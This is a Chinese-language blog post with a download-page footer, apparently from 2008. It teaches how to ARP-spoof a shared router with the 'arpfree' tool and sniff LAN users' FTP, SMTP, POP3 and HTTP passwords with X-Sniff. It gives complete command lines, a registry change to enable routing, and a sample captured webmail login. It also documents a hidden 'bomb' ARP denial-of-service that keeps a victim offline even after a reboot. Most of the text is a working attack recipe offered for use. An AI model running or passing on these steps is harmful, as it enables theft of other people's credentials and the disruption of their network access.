`

arpfree + xsniff嗅探局域网密码

阅读更多
试验环境:
   一台八口共享上网路由器,接八台电脑 !在其中一台机器上嗅探密码

步骤如下:
        1,首先ping 192.168.0.1 网关,然后用arp -a 获得网关Mac地址 0000ea0123de
      2,使用arpfree欺骗网关,让它将其他机器发向网关的包发给嗅探主机
          命令如下:
                 arpfree 0000ea0123de 123412341234 request 1.1.1.1
        3,启动sniff开始嗅探
             命令如下:          
  xsniff -pass -hide -log pass.log
   4,打开pass.log就能察看嗅探到的密码!
      示例:
   TCP  [05/10/06 22:17:40]
192.168.0.8->202.108.9.77 Port: 1158->80
    HOST: mail.163.com USER: 1111111, PASS: 1111111
Arpfree + X-Sniff嗅探局域网密码
游泳的鱼 发表于 2008-1-14 15:48:00

0
推荐
ARP简介:

要使用ARP欺骗,必须启动ip路由功能,修改(添加)注册表选项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1

发送ARP报文的软件,可以发送任意 源,目的 地址的ARP报文,可以结合Sniffer做不少的事~不用老在Sniffer里做ARP包了~

不过要安装WinPacp 3.0驱动先...

发送的时候可以选择ARP的TYPE。如果是ARP请求报文,则只要输入要访问的IP地址。

如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址

最后的发送速度可选参数为:(大小写敏感..我觉得挺不好的)

fast---------最快
hear---------每60ms一个包(可能是比较适合结合Sniffer做监听)
slowhear-----每500ms一个包
auto---------每1秒一个包
slow---------每2秒个包

使用方法如下:

***********************************************************************
(1)Send arp packet in "request mode"  Examples:           
  arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast     
         |      |     |   |  |      
      你的网卡地址    |     |   |  |      
             对方网卡地址   |   | 速度     
                   arp方式   |         
                         |         
                      你的IP地址       
***********************************************************************
(2)Send arp packet in "reply mode"  Examples:                     
    arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto   
        |      |    |   |   |  |      
     你的网卡地址    |    |   |   |  |      
            对方网卡地址  |   |   |  速度     
                 arp方式   |   |      
                       |   |      
                    你的IP地址  |      
                          |           
                         对方IP地址       
***********************************************************************


反击“Lan终结者”的办法:

1:发动比他更强烈的攻击:

arpfree 0050fc272b26 ffffffffffff request 1.1.1.1 fast     
       |     |    |   |  |      
    你的网卡地址   |    |   |  |      
         对方网卡地址 |   | 速度     
              arp方式  |         
                    |         
                 你的IP地址       
2:交换机竞争:
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
       |      |     |   |   |      
    你的网卡地址    |     |   |   |      
       你想攻击的人的网卡地址  |   |   速度     
                arp方式    |         
                       |         
                   你的IP地址       

方法1将导致他IP地址冲突(比“终结者”来的猛烈多了)

方法2将使得他无法连接网络(由于交换机把他的流量都给你了)

***********************************************************************

因为有朋友反映在非交换环境下,如使用HUB的情况下,无法对目标进行打击

故增加参数“bomb”,使用方法如下:

假设目标为IP:192.168.237.109 目标mac为:011a8575a436

攻击命令如下:

arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb

其实就是进行简单的ARP DOS攻击,快速刷新目标的ARP缓存,可以在消耗自身较少系统资源的情况下

造成和PDOS工具类似的效果,并且如果你不停止攻击,对方重启以后也无法正常进入系统

(当然前提是他没拔网线)。

其实这样做是十分不厚道的....所以参数就没有写在程序的 HELP 里面,大家慎用...


=========================================================================

X-Sniff嗅探器

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明 
-tcp 输出TCP数据报 
-udp 输出UDP数据报 
-icmp 输出ICMP数据报 
-pass 过滤密码信息 
-hide 后台运行 
-host 解析主机名 
-addr IP地址 过滤IP地址 
-port 端口 过滤端口 
-log 文件名 将输出保存到文件 
-asc 以ASCII形式输出 
-hex 以16进制形式输出 
用法示例 
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出.


==========================================================================

实验开始...

试验环境:

    一台八口共享上网路由器,接八台电脑,在其中一台机器上嗅探密码

步骤如下:

    1.首先ping 192.168.0.1 网关,然后用arp -a 获得网关Mac地址 0000ea0123de
    2.使用arpfree欺骗网关,让它将其他机器发向网关的包发给嗅探主机  命令如下:
      arpfree 0000ea0123de 123412341234 request 1.1.1.1 hear
    3.启动X-Sniff开始嗅探  命令如下:
      xsniff -pass -hide -log pass.log
    4.打开pass.log就能察看嗅探到的密码!

示例:
    TCP  [05/10/06 22:17:40]
    192.168.0.8->202.108.9.77 Port: 1158->80
    HOST: mail.163.com USER: 1111111, PASS: 1111111

如果是非交换环境,可省略1,2步。

面提到的xsniff.exe 十分小巧,但是功能强大,呵呵呵!
使用说明 请看下面的
可捕获局域网内FTP/SMTP/POP3/HTTP协议密码
参数说明 
输出TCP数据报 
-udp 输出UDP数据报 
-icmp 输出ICMP数据报 
-pass 过滤密码信息 
-hide 后台运行 
-host 解析主机名
-addr IP地址 过滤IP地址 
-port 端口 过滤端口 
-log 文件名 将输出保存到文件 
-asc 以ASCII形式输出 
-hex 以16进制形式输出 
用法示例 
xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出.
上面提到的arpfree工具使用说明请看 http://www.netexpert.cn/viewthread.php?tid=550
分享到:
评论

相关推荐

    xsniff DOS嗅探器

    xsniff嗅探器软件(windows下最小的嗅探器) WIN7下可用

    xsniff【嗅探工具】 用于反击盗号者

    xsniff一个嗅探工具 可以探测邮箱等密码 利用该工具可以探测盗号者的发信邮箱密码 和收信网站及邮箱 可用于反击盗号者 内附简单的使用命令

    xsniff 命令行方式嗅探器

    简易的命令行方式嗅探器,可捕获局域网内FTP/SMTP/POP3/HTTP协议数据

    xsniff.rar

    xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

    XSNIFF免费注册版

    -port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中 xsniff.exe -...

    Xsniff_shell.rar_xsniff

    安全焦点Xsniff嗅探工具的外壳程序,需要安全焦点Xsniff来配合运行。 原创者:djhui

    xsniff(简易的命令行方式嗅探器)

    简易的命令行方式嗅探器,可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。

    xsniff.exe

    xsniff.exe

    xsniff下载。。。

    xsniff 一般都知道是什么 不懂百度下。。。

    内含xsniff,nc等经典工具的DOS工具包

    很不错的DOS工具压缩包,内含xsniff,nc等经典dos工具。

    X-sniff监听工具

    为程序员提供Delphi,VC,VB,PowerBuilder,.Net,Java,PHP,ASP,PERL,Python,Foxpro,Javascript,汇

    cmd操作命令和linux命令大全收集

    79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 80. services.msc---本地服务设置 81. Sndvol32-------音量控制程序 82. sfc.exe--------系统文件检查器 83. sfc /scannow---...

    批处理详细教程

    基本格式 63 附录8下载软件 64 瑞士军刀:nc.exe 64 扫锚工具:xscan.exe 67 命令行方式嗅探器: xsniff.exe 69 终端服务密码破解: tscrack.exe 70 其它 72 附录9 FTP命令详解 75 附录10 ...

Global site tag (gtag.js) - Google Analytics